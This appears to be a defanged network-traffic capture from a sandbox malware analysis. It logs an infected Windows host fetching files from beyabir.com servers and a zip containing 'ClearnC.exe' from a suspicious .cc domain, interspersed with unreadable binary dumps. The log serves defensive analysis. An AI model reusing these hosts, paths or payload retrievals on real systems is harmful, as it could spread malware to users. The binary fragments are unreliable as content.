 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:7496059F5C24E31185CEB55A04ED8505" xmpMM:DocumentID="xmp.did:9957
4DB952A011E39674B18426DE0A96" xmpMM:InstanceID="xmp.iid:99574DB852A011
E39674B18426DE0A96" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7EDADDF8E724E311B036
C0E7691E1950" stRef:documentID="xmp.did:7496059F5C24E31185CEB55A04ED85
05"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>...C...'[email protected]<..9i...RJi.v......
!.l..W.n....=.#.....~.;......%H.q8.0.. . .....u...4..... Hp*/.@#. . .v
$.H H H...4.....`G...R..uuy..m[.u}..g.%...i.!.a.S..}{...ww^k..#B.C^...
b.*..26a}._..-....8......F:?K.E...f...R.......t..RDh...S.x....)f.|8.O.
.'O.8......F.q./:...#..:N9.........\w.K\o#...k.o3...RykW.......LQyh...
{...#U{...^w..wS......A...h$@.@[email protected]$.$0..F....v..
@[email protected][email protected][email protected].......
...@#. ....H H`..........@#...F;.H H. ...4... H`G.........@#......
<<< skipped >>>

GET /img/Global/No_Button.png HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1090
Connection: keep-alive
x-amz-id-2: 7WjnhU0tPyReiclfSk2lMFXKk a5jcICVQZv5/SuoOjs3rkF2ueCvAPmIZCZwiYU
x-amz-request-id: 7FCF11E31494066F
x-amz-meta-s3fox-filesize: 1090
x-amz-meta-s3fox-modifiedtime: 1380713503002
Last-Modified: Wed, 13 Nov 2013 16:12:45 GMT
x-amz-version-id: H1gWa5fQ5azVvHrSdifdTj_fe_Q1czxc
ETag: "4462e7ebdf4a24f57b288fbca0602dea"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D2B0E0124EA11E392EFCCF1
BDECC388" xmpMM:DocumentID="xmp.did:2D2B0E0224EA11E392EFCCF1BDECC388"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2B97008A24EA11E392
EFCCF1BDECC388" stRef:documentID="xmp.did:2B97008B24EA11E392EFCCF1BDEC
C388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>...\....IDATx...1..1.E'A...J/ .*.....ZYne..
3....jR...!.#I1?.H..5..v..T.KSl...Rz...r.W.......m\|...C.'.`.#.f......
.A(B..P@(B...E(B...E(B.....f&Y:.j..-G......3.&...i...s.G.l.a;...%].j.V
.j.....h"..5.......IEND.B`.....
<<< skipped >>>

GET /img/Sihehihi/Sihehihi_31_03_15.png HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 7421
Connection: keep-alive
x-amz-id-2: tb3wzOqbdaXKpKNL10W0GD7quW/G8dQsROYO1ZNZx4BSp/ WOCV6IN Tr7fFpLso
x-amz-request-id: 1A430C7BD6E060DF
x-amz-version-id: fwDsegYHRL0JOsa1HMn_zrCAJNbvgq_T
x-amz-meta-cb-modifiedtime: Tue, 31 Mar 2015 09:00:45 GMT
Last-Modified: Tue, 31 Mar 2015 09:01:01 GMT
ETag: "99901d117a18376c2cf58e46fe682679"
Accept-Ranges: bytes
.PNG........IHDR.......9......K......sRGB.........gAMA......a.....pHYs
..........o.d....tEXtSoftware.Paint.NET v3.5.11G.B7...lIDATx^...X....g
.....b..N.5.....5v.5F....X...a..PA.."..XQ)..H...T.....{..C.FE...7...&l
t;.gfN.a....sfXN!.....O...E'..d?rW.A.....2.y.."........)m. .wm...!.]..
..).n.y;g!kb..&.!kr....).....Y3..53...}.=...K. {.jd.j)VWH..%..UC...H..
....8b......!G..R$v.!n.:[email protected]!yc.....zS.
^[email protected]).G.$,....-.qWELV.s... ...[......4.r
......d.5Qt["/...$..m 6..R..O....1}.sL:...~..o.LH..E..7..[y..".pg.;gpB
.k-!.."...".....r.{C.i...*...Px.^.<~...r##..^`.$..z......t......S..
]K.0.9..z...?]......J.7."xNX"...*\..L.2..`?PZ./O&c.5C...xa,..W........
`]d_...8.\R. ...{...n<.u..........9...ptD.:.m..>..f....j..*.....
...`S7\5...w....$.O~qGn.i......3.v....%d[.B|.R......@[...B.....y$;....
.;.).......h...C!....6"..-...c...O...!..(.m0........y.p..J.i..;k.....Y
.M/..a.<....g.4.kI...8C.O.".C.1'x.]QGXl.. Y.....<Dc<D.Jy..B8.
.N..z..*.o....D.:......]O..i@~.kb..VF(.].Y.5.j...k...<[email protected]
u.~^..;y.Fh.Wh...#..>...J`....:....(.7...V..,!.........]p.G)..`.l..
...d..!s.6./[email protected]..."O !..J.h .....<vyH...Af...*.Y...e.......K
>"........i.x....8..]Kp..p.fqe[....,;".{#.-.B.....5P..&.H-2O-....f.
D...m)..e.R$..pu..%.x.......o|....T..}N'.F.....B.H...M...y..P.K..Y...-
...4.;lDaP......X.....c..dW%.{)#.......8H.%...G.Bx.......I6........ .8
..p.)p.....D.J..C.?........4..O8.w..`?.(..-.........p.SY..|.lZ.....6V.
n.y.^.#......b.8<?.#..G...9.%(....U..4#..D.Z.c.).G.x\-.p....Y..
<<< skipped >>>

GET /img/Rerarapepe/logo_new.png HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 4569
Connection: keep-alive
x-amz-id-2: i8ICCXz5aRAGTe6TbJWncaksmnn7Nf o0zWa6P1Emvu b2naXV5VqYrZ44fl/JsT
x-amz-request-id: F053A26F739ABFD6
x-amz-meta-s3fox-filesize: 4569
x-amz-meta-s3fox-modifiedtime: 1388397217065
Last-Modified: Mon, 30 Dec 2013 09:53:59 GMT
x-amz-version-id: FBdIFQNqjG8fAIwxlMklzjPUXqz3Asib
ETag: "3263ff057b8e7380f7579d5aaab2bfdc"
Accept-Ranges: bytes
.PNG........IHDR...2...2......?......tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2A43320D713811E3B459B11F
BD9400CD" xmpMM:DocumentID="xmp.did:2A43320E713811E3B459B11FBD9400CD"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2A43320B713811E3B4
59B11FBD9400CD" stRef:documentID="xmp.did:2A43320C713811E3B459B11FBD94
00CD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>v.Gr...MIDATx..Z{p\U......$.l.6M.jc..P....T
.N.*3.80`...:#.......3>...F..|...3>..hE..(...P-i..y7.$....{.=..w
......6)...~.....~..;.PJ.....ur.n.......O|.&...hj&.H.e2$l..y.T*...D.3E
.#.A -^t.....TzA-....P.N..i.'.........T..z>.GT.%r........"..H9....R
...I......}..@.^../..?o.U...F..c.qA.H.?A.(a.....k....,.!Vb.......:58.K
...@z>K[.......S_....T.......... lr......GU..~.....C......t24;f.M.R
%...4......`............%..aZ`.... [email protected].&0^.`v. u.
...?Y....e..%.."ik..^....s.}.~.8Iu..?........m...{ix.KM..........,4R..
[email protected]]p!%Z..f.$k......hB.......DK...R.&..k..%#e.
<<< skipped >>>

GET /img/Rerarapepe/Rerarapepe.png HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 3657
Connection: keep-alive
x-amz-id-2: Z0jI9oUtCmkwjhrm4fpr7I34XCbbJafI4wdwaCXRwxEFhVvEbJ9HB6a84y2LlhS6
x-amz-request-id: 6ABD9C086DAAC9E3
x-amz-meta-s3fox-filesize: 3657
x-amz-meta-s3fox-modifiedtime: 1402226184727
Last-Modified: Mon, 09 Jun 2014 14:19:41 GMT
x-amz-version-id: nXvqG1jeKyMVMqgSg3LnBI1CMsSqJwdV
ETag: "e568d92e622a3ac2f573a98d91df1421"
Accept-Ranges: bytes
.PNG........IHDR.......!.............tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D84B53BEEFE11E39491D45C
0DAE79C8" xmpMM:DocumentID="xmp.did:2D84B53CEEFE11E39491D45C0DAE79C8"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D84B539EEFE11E394
91D45C0DAE79C8" stRef:documentID="xmp.did:2D84B53AEEFE11E39491D45C0DAE
79C8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>..(.....IDATx..Wi....~U.=....][email protected]
...Vb..`..H8.\..D. Q.EA.....Q8..cB.c....&vv}a........3;..]..z...(%..LM
u......^3..1"...mr.. ..b...z.B.\.<]!...8...J.~.R.^.U....ArE...q...Q
W......W.. M..l......R..Dd."...P......F..-.....S...S... .OF...I./.N.&e
6.....TW.c....z......@.......`_.X'...X8.3op.'...z&.UT.m...r4:.1.'&.1F.
...9....Fr&..U...d......<..Z.Q.^.}]X.......D!......73.a.8.....Q..c.
w...).^U#..L3..}m......:.z..NN...r.Y..Ck..E}..-....t1..?g..d..t.E:4x.*
#....L...(wv..~.OY.......wfO.L.0....4...Ko........h. s6M\.D....$.....W
......6g...............>x....<..[...F"5C..=K.....[v...O'..ky
<<< skipped >>>


GET /pki/crl/products/WinPCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Sat, 07 Mar 2015 06:01:44 GMT
Accept-Ranges: bytes
ETag: "dde36a309c58d01:0"
Server: Microsoft-IIS/8.0
VTag: 43879645100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 561
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:16 GMT
Connection: keep-alive
0..-0......0...*.H........0..1.0...U....US1.0...U....Washington1.0...U
....Redmond1.0...U....Microsoft Corporation1 0)..U..."Microsoft Window
s Verification PCA..150306223202Z..150605105201Z._0]0...U.#..0.......p
............<.J0... .....7.......0...U......40... .....7......15060
4224201Z0...*.H.............4......n[.t........'....Dx.P3R.!3.|D.6vL..
"k..9'....L..k......e.4......._..N..TJ......N.fP...H.....8...TJA...fGA
.e...^"{../...H?..E.Y.U....h..0/.......d...6..K..V?QM...{..h.....{.3..
.v.....\~.7n..5..'..k.Ia.YL..LP.b....._7.V..%......z*$q..Y..f.b..L8<
;~..v.w....


GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1


Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Thu, 05 Mar 2015 06:01:35 GMT
Accept-Ranges: bytes
ETag: "cf2633d6957d01:0"
Server: Microsoft-IIS/8.0
VTag: 43853244400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 550
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:16 GMT
Connection: keep-alive
0.."0......0...*.H........0w1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Microsoft Corporation1!0...U....Microsoft Time-St
amp PCA..150304221607Z..150603103607Z._0]0...U.#..0...#[email protected].. .
.5..0... .....7.......0...U......20... .....7......150602222607Z0...*.
H.............Y..}y`....T.Z..`B<..I.N..O... E:....7......a..)......
...._|W5laoqi(..>t~.."...&`.._.7J...:..{bO_Kyi...R...!...B.s..I.c&j
...(I\.S{._;@B...[i.e.[."...R` \...........M^k.=q[.V...9y..G.1o#k3<
.W.......H.$>}...U...2qyd2|b.fB.....r....H.P...;....Q...b......5%.P
.#..



GET /?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg HTTP/1.1
Host: VVV.google.com.ua
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=51f9c94f4cfe29d4:FF=0:TM=1430435240:LM=1430435240:S=g94WORl29EpjfH1w; expires=Sat, 29-Apr-2017 23:07:20 GMT; path=/; domain=.google.com.ua
Set-Cookie: NID=67=qdoOTsxHIBtzTljMGdrpSFmRCtEgqqpaqGd7TQCsWjdJn2cW0q0YIqjLKJ0KLzJVLGIWtQmLiygzoNGFC7PcavEgBZ0BXopqy-HiWAZ0-35cuvO-QET6X7KCnu_zeje-; expires=Fri, 30-Oct-2015 23:07:20 GMT; path=/; domain=.google.com.ua; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Thu, 30 Apr 2015 23:07:20 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLte
DNJmBgQg&gws_rd=ssl">here</A>...</BODY></HTML>
;..HTTP/1.1 302 Found..Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&
ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl..Cache-Control: private..Content-Typ
e: text/html; charset=UTF-8..Set-Cookie: PREF=ID=51f9c94f4cfe29d4:FF=0
:TM=1430435240:LM=1430435240:S=g94WORl29EpjfH1w; expires=Sat, 29-Apr-2
017 23:07:20 GMT; path=/; domain=.google.com.ua..Set-Cookie: NID=67=qd
oOTsxHIBtzTljMGdrpSFmRCtEgqqpaqGd7TQCsWjdJn2cW0q0YIqjLKJ0KLzJVLGIWtQmL
iygzoNGFC7PcavEgBZ0BXopqy-HiWAZ0-35cuvO-QET6X7KCnu_zeje-; expires=Fri,
 30-Oct-2015 23:07:20 GMT; path=/; domain=.google.com.ua; HttpOnly..P3
P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/acc
ounts/bin/answer.py?hl=en&answer=151657 for more info."..Date: Thu, 30
 Apr 2015 23:07:20 GMT..Server: gws..Content-Length: 275..X-XSS-Protec
tion: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 
80:quic,p=1..<HTML><HEAD><meta http-equiv="content-type
" content="text/html;charset=utf-8">.<TITLE>302 Moved</TIT
LE></HEAD><BODY>.<H1>302 Moved</H1>.The doc
ument has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&e
i=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl">here</A>...</BOD
<<< skipped >>>


HEAD /ofr/isicicc2.7.cis HTTP/1.1
Accept: */*
Host: cdneu.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: application/x-unknown-content-type
Content-Length: 385602
Connection: keep-alive
x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=
x-amz-request-id: 2863C8C2B1E22044
x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM
x-amz-meta-s3fox-modifiedtime: 1424088160999
x-amz-meta-s3fox-filesize: 385602
Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT
ETag: "83fc375cf199ed35bd27a27f506b831f"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:08 
GMT..Content-Type: application/x-unknown-content-type..Content-Length:
 385602..Connection: keep-alive..x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1
LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=..x-amz-request-id:
 2863C8C2B1E22044..x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM.
.x-amz-meta-s3fox-modifiedtime: 1424088160999..x-amz-meta-s3fox-filesi
ze: 385602..Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT..ETag: "83fc3
75cf199ed35bd27a27f506b831f"..Accept-Ranges: bytes..HTTP/1.1 206 Parti
al Content..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:10 GMT..
Content-Type: application/x-unknown-content-type..Content-Length: 1808
02..Connection: keep-alive..x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW ND
usKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=..x-amz-request-id: 2863
C8C2B1E22044..x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM..x-am
z-meta-s3fox-modifiedtime: 1424088160999..x-amz-meta-s3fox-filesize: 3
85602..Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT..ETag: "83fc375cf1
99ed35bd27a27f506b831f"..Content-Range: bytes 204800-385601/385602.. .
(.....Y_...u9.o....)...d..Q.........n.....W.~..D...A..^........$ t../.
...<..$..H..Md^#......m....-.z{..B?$...K.n:hL......'..%....E..;..e.
.H.U........M..2.R}......H......#...U!.`.C..m._.........n.....E...^...
....-54. ..I.Y...tRQ....o?.....H..@|h.......&... F..."........L....Q.g
n.1....!..LS..............:.Q.)n...%..Cn2.d..N.....Z.;.L..]..gy..if,.D
4=..=....;,].>....Ln...O..1......4.H...g/3.;P..Edh..'<l....2
<<< skipped >>>

GET /ofr/isicicc2.7.cis HTTP/1.1


Range: bytes=102400-204799
Accept: */*
Host: cdneu.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive



..^....o.... *..c.'Q6.U}iW.......{r...J.6>y.W...@3!(.W.....K.p.O...
5.<[email protected]......".O.>P..E ;Q].A.H. ..0.x....._..h.I... .
....lH.B..'..`[email protected].(..."...=*<xq.D(..%.#..z..c..|e...sC....-
.......w.6......|[email protected]<$.YhA...........z.pO.......h..*....
...G..`......JX_.......t#S.4P..t.>-./.U$.\.....~...XF<.7-....../
}..=.({i...>..3.)4..#.S..`.. .\.......K..Y>1G..0h.....,.&..0 ..V
..<GO<g.w...y...'_........1........b..%(.82.*L......l..C...gIo#r
..]F.9...5VhmA.s|n.[...%... .<.\..H..N.X...?....'A..8.(i..(...c....
..ga7lZ.^.P'... ..G..#i.a).U.].C..Q........ZfSL.....ZP6.K=.j../o.z....
..TkjSEB...nC......OQ..&..kJ.!q.D;[email protected]<...b...W....,..Y..\ `.../
.t.....r(........Q..{....g..L6Xj.....,B...Z0..jt....V..T7.:.K.....$..S
\...G.m.T\.....V...s*L0.1..j....VM......j7..e.G ^B...43q.8.H.3..Al..O.
..........<.7..%..t..:....,2R".W........f.....i6.HS. ..X.c1../..0;-
....,.C:.9.dk.T.....VK..%...!.G.}.r.2..p.C.1...#.....O......O3.8QO.s..
.....!...Y....{.....I.....98...........v0.._..[.....}m..m.;)....S0L..q
....r...LW.>....P....X..e..v..^...q.=..4FD.....""".#&.5.y.f..}.u..L
.....G..1 .w..05.........kB.g.-...._v.A...A.....7w.......$...l....X..c
d...{..|;.7.:........xv.....i...S.4.d!..6...*......n:.k(.7CN....(*...^
t..(6$7F..cO;VG.$...H......E...)...WA[0Y.6.P.=.`.E.R....JP.f.l.O.h...}
....g.....S...........%h.d....jr.Y..........=.~.y. GU.1.........A....&
lt;>..%h%..........k.h....)%F............Y.C......0.>B..F9....H.
...IfqV5.a.OM...:.........F.y.mno...J..n.......)...5.......1k.....
<<< skipped >>>


GET /3517/2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 01 May 2015 01:05:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14p1
Location: hXXp://VVV.ejpkwz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
0......


GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 May 2015 01:05:38 GMT
Content-Type: application/zip
Content-Length: 3016484
Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
PK........}*.F.4.k5...0.......479.db.0...!..........<..A#.U......L.
.......* ...i.AU%......k.1...o4...MX*.8.D.].J.. ..f.q.oV.Q7..c..%!u..&
gt;..2.He.}.tod.Z..^B...ru-2(.........`h`.}...|g*..g...R.gcsw(.xa..x.v
.C.]O $.".........3......4.........b...1Y8E. L........v.n..3.^B...ru-w
.......c^.0......q|.".2.l..........iU.Z.....K.|..F.1...........Hov43E3
fPK.........).F.U..............ClearnC.exe...`...8.?.#..6......HP4....
.4.l.J`C`[email protected] ..j..U.j..W.\lK[o..U.Vt..$(..\.B...N.Tc.. .y.9.
.f....}.......=...9sf...33...-..A0.QUA8$......u..u..F......C......bC..
.z....6.....i.h{..V-m.m.d.Z.o.........T-....:.\....i....7.|....>...
.....uP...........M..[;.'................!u.M..........~...n.....F.k.v
. ..:..C....".....a#0......P...N..]...:.......e..m....}w.....".I......
r..l......u.:H.!........|3n....g.O=....Bwe..m.5....:^g.........*7C...r
..Y.._.n....._.[..x...C.P.....3cO.>S......w....s.{.K..r..pU.^.).sO.
:.......PG*.9O..&A..*..\.V'Q....&...`9..H.[.'b4.bk./NY.......gW.x.!.y.
r...4.t.Sr......V_Ab..X..S>..jN..I..h.. s<:.KM2B>J...4J...I.|
v..B..=......$3.A9R..*....H......jR...=dP.c...H..H..n.m......~4dS..g.1
t......N...!.o.r.O\.[..b...n5...5....~.E.. ...>.^".1S.HU:.~|.|.mTZ.
.s...L...x...k.#...._....?h.......i..7.>..t................R..=....
...b]..z...W...h!.'.O.U.....Mk....=\...CN....~ .5)...~..Gg.0.x........
...8>.!*....N.y..O..j%0.......Vh{.l..O..... `..RM..t.P..6....u.....
..;...r.0\j...`2F.CC..... ..E.......9......ao .GL......<br.j..Y....
N.e..,?Jt;I.I..W~A.V._...Gl..q;&..M=.5....M./.<...)&...W.>..
<<< skipped >>>


GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:56 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120183, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:20:25 GMT
Expires: Sat, 02 May 2015 10:20:25 GMT
ETag: "d08b003f15d07cc5bfc23c2479efc8bedd8da485"
Content-Length: 1788
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Vali
dation Authority - G2..20150430222025Z0l0j0B0... ..........._lkv...8..
f..R34N..@..'..4.0.3..l...,......E..........20150430222025Z....2015050
2102025Z0...*.H..............\.{...I...8P.q]..q6.a_.n#.......4.)Y.vn.3
..tV..%ZYn..(.?.....@X\..).XeA/. ..v..7.~...R..c.F. ..........!...nI.=
`...C..v......A...H..S.x..........4.AEw,..1.....!=..U&...t......Ii..A.
.p)....N0{..Z..L...M>t...m......^...y.....^*.E..2NG..p.>NH.H....
.6.j....z.....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....
US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1
-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secu
re Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U
....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 
0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0..
.......xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D
....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I
..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../..
..^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U
.......0.0...U...........0...U.%..0... ......... .......0...U.......O.
.......f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godadd
y.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....00
